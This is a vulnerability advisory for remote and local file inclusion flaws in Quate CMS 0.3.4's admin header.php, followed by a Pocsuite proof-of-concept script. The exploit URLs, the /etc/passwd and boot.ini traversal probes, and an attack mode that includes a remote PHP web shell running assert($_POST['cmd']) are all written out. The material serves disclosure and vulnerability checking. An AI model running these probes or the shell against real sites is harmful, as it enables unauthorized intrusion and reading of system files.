Quate CMS 0.3.4 LFI/RFI Multiple Vulnerabilities

2014-07-01T00:00:00
ID SSV:65420
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

1.2 Remote and Local File Include

1.2.1 漏洞分析

admin/includes/header.php

```php
if ($bypass_installed != 1) {
    if (!is_file("../includes/installed")) {
        ...
        require("../includes/simple_gui.php");
        exit();
    }
}

if ($bypass_restrict != 1) {
    require_once($secure_page_path. "includes/secure.php");
}

$admin_template_default = "default";
if ($not_logged_in != 1) {
    //echo $row_secure['account_theme'];
    if (file_exists("includes/themes/" .$row_secure['account_theme']. "/header.php")) {
        require_once("themes/" .$row_secure['account_theme']. "/header.php");
    } else {
        require_once("themes/" .$admin_template_default. "/header.php");
    }
} else {
    require_once("themes/" .$admin_template_default. "/header.php");
}
```

1.2.2 漏洞利用

http://[host]/admin/includes/header.php?bypass_installed=1&secure_page_path=[rfi]?

http://[host]/admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=[rfi]?

1.2.3 漏洞修复

需要关闭远程包含：在 php.ini 中将 allow_url_include 设置为 off。上述代码中的 $bypass_installed、$secure_page_path、$row_secure 均未在脚本内初始化，而是直接来自请求参数（依赖 register_globals），因此仅过滤 '..' 并不能阻止不含 '..' 的路径；更彻底的修复是不从外部输入读取包含路径，并关闭 register_globals。

```php
if(@strstr($row_secure[account_theme],'..')){ exit(); }
if(@strstr($secure_page_path,'..')){ exit(); }
```

                                                #!/usr/bin/env python
# -*- coding: utf-8 -*-

from lib.core.data import logger
from lib.core.enums import CUSTOM_LOGGING
from lib.request.basic import req as requests
from lib.core.poc import Output, POCBase
from lib.core.register import registerPoc as Register


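class QuatecmsHeaderRFIPOC(POCBase):
    """Pocsuite check for the file-inclusion flaw in Quate CMS 0.3.4 ``header.php``.

    ``_verify`` first probes for remote inclusion and, if that yields nothing,
    falls back to two local-inclusion probes (Windows, then Linux).  Every
    probe issues exactly one HTTP request and counts as a hit only when *all*
    of its marker strings appear in the response body; the original code used
    ``"a" and "b" in text``, which only tested the last marker.
    """
    vulID = 'SSV-65640'  # vul ID; NOTE(review): the advisory above is listed as SSV:65420 — confirm which is correct
    version = '1'
    author = 'huakai'
    vulDate = '2008-08-06'
    createDate = '2015-10-15'
    updateDate = '2015-10-15'
    references = ['https://www.exploit-db.com/exploits/32186/']
    name = 'Quate CMS 0.3.4 - header.php Remote File Inclusion Vulnerabilities'
    appPowerLink = 'N/A'
    appName = 'Quate CMS'
    appVersion = '0.3.4'
    vulType = 'Remote File Inclusion'
    desc = u'''
    Quate CMS是运行在PHP和MySQL上的网站内容管理系统。
    header.php的参数未做好处理导致包含漏洞
    http://[host]/admin/includes/header.php?bypass_installed=1&secure_page_path=[rfi]?
    http://[host]/admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=[rfi]?
    '''

    samples = ['']

    def _probe(self, include_value, markers):
        """GET ``header.php`` with ``secure_page_path`` set to *include_value*.

        Args:
            include_value: value placed after ``secure_page_path=`` in the query.
            markers: strings that must all appear in the response body.

        Returns:
            The probed URL when every marker is present, otherwise ``None``.
        """
        verify_url = self.url + "/admin/includes/header.php?bypass_installed=1&secure_page_path=" + include_value
        r = requests.get(verify_url)
        body = r.text
        if all(marker in body for marker in markers):
            return verify_url
        return None

    def in_win(self):
        """Local-inclusion probe for a Windows host (``boot.ini``).

        Returns the probed URL on a hit, else ``None``.  The trailing ``%00``
        relies on null-byte truncation in older PHP; on builds without it the
        probe yields nothing and the check may miss a vulnerable host.
        """
        return self._probe("../../../../../../../../../../../boot.ini%00", ("[boot loader]",))

    def in_linux(self):
        """Local-inclusion probe for a Linux host (``/etc/passwd``).

        Returns the probed URL on a hit, else ``None``.  Both ``root:`` and
        ``nobody:`` are now required; the original condition only tested
        ``nobody:`` because of the ``'root:' and 'nobody:' in r.text`` precedence bug.
        """
        return self._probe("../../../../../../../../../../../etc/passwd%00", ("root:", "nobody:"))

    def _verify(self):
        """Verify the flaw: remote inclusion first, then the local probes.

        Returns:
            An ``Output`` built by ``parse_attack`` — success with
            ``result['VerifyInfo']['URL']`` set, or failure when no probe hit.
        """
        result = {}
        logger.log(CUSTOM_LOGGING.SYSINFO, u"开始尝试远程包含")
        # All three markers are required; the original tested only the last one.
        verify_url = self._probe(
            "https://www.baidu.com/robots.txt?",
            ("Baiduspider", "Googlebot", "Disallow: /baidu"),
        )
        if verify_url is None:
            logger.log(CUSTOM_LOGGING.SYSINFO, u"远程包含失败,开始尝试本地包含")
            # Bind each probe result once: the original called in_win()/in_linux()
            # twice on a hit, sending a second request to the target.
            verify_url = self.in_win() or self.in_linux()
        if verify_url:
            result['VerifyInfo'] = {'URL': verify_url}
        return self.parse_attack(result)

    def _attack(self):
        """Attack mode: remote inclusion of an operator-supplied script.

        The URL still contains the literal placeholder ``[shell]`` and nothing
        in this file substitutes it, so as written this method cannot succeed;
        it is kept unchanged apart from documentation.
        """
        result = {}
        verify_url = self.url + "/admin/includes/header.php?bypass_installed=1&secure_page_path=http://[shell]"
        # Expected body of the included script: <?php @assert($_POST['cmd']);var_dump(md5(123));?>
        r = requests.get(verify_url)
        if "202cb962ac59075b964b07152d234b70" in r.text:  # md5("123") echoed by the script
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = verify_url
            result['ShellInfo']['Content'] = "@assert($_POST['cmd']);var_dump(md5(123));"
        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap *result* in an ``Output``: success when non-empty, else a failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output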


Register(QuatecmsHeaderRFIPOC)